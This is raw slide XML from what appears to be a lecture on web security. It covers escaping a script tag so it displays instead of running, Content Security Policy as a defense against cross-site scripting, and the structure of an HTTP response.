              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="85725">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="85725">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="85725">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="object 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49F43BE2-ADE7-C940-A062-572C75A6D9B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6550025" y="6035040"/>
            <a:ext cx="2576830" cy="635000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Script does not </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>run</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>but  gets</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>displayed!</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="177183293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2304D1-A4FF-CD4C-B5AA-38B94770BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>XSS Defenses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD665A0D-3A60-0C46-B420-B25C7FF87279}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSP: Content Security Policy     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Content-Security-Policy HTTP header allows the response to specify white-list, instructs the browser to only execute or render resources from those sources</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="389833187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2304D1-A4FF-CD4C-B5AA-38B94770BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>XSS Defenses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD665A0D-3A60-0C46-B420-B25C7FF87279}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSP: Content Security Policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Example:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                                     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>script-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> 'self' http:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="-4" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>b.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>img-src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="239774166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2304D1-A4FF-CD4C-B5AA-38B94770BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>XSS Defenses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD665A0D-3A60-0C46-B420-B25C7FF87279}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSP: Content Security Policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Example:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                                     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>script-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> 'self' http:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="-4" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>b.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>img-src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allow scripts only from the server or from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://b.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, but not from anywhere else</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allow images to be loaded from anywhere</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="371461364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5" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17FE0F8F-2C31-0447-AEC1-570C447A878D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2590800"/>
            <a:ext cx="9144000" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="9600">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a: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7E82630A-CCC5-8D4A-B9FF-E9F3B3EE64B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="2590800"/>
            <a:ext cx="9144000" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6600" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Thank You</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30A4EC78-EFF1-E446-A1CE-041C545F1632}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="3581400"/>
            <a:ext cx="8686800" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6600" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>be on the road</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61AFD8-C569-A448-A66F-D3682B76E096}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>HTTP Response</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23FC0BAB-019C-3D4F-935B-E64C2806186A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1527174" y="2454531"/>
            <a:ext cx="6764337" cy="3223189"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4422775" h="2640329">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4422774" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4422774" y="2640011"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2640011"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D7A1D77-CD03-AA44-99C8-E829220C6FB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="2445261"/>
            <a:ext cx="6950075" cy="2948884"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="41275" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="325"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" i="1" spc="150" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>HTTP/1.0 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="280" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>200</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="15" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="190" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>OK</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="225"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" i="1" spc="180" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Date:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="80" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="240" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Sun,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="85" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="160" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>12</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="85" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="245" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Aug</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="85" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>2012</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="85" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>02:20:42</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="85" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>GMT</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPts val="1425"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="209"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" i="1" spc="220" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Server:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" spc="220" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="220" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Microsoft-Internet-Information-Server/5.0</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="1667510">
              <a:lnSpc>
                <a:spcPct val="114599"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" i="1" spc="225" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Connection: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="245" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>keep-alive  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" i="1" spc="245" dirty="0">
              <a:solidFill>
                <a:srgbClr val="595959"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="1667510">
              <a:lnSpc>
                <a:spcPct val="114599"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" i="1" spc="220" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Content-Type:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" i="1" spc="215" dirty="0">
                <a:solidFill>
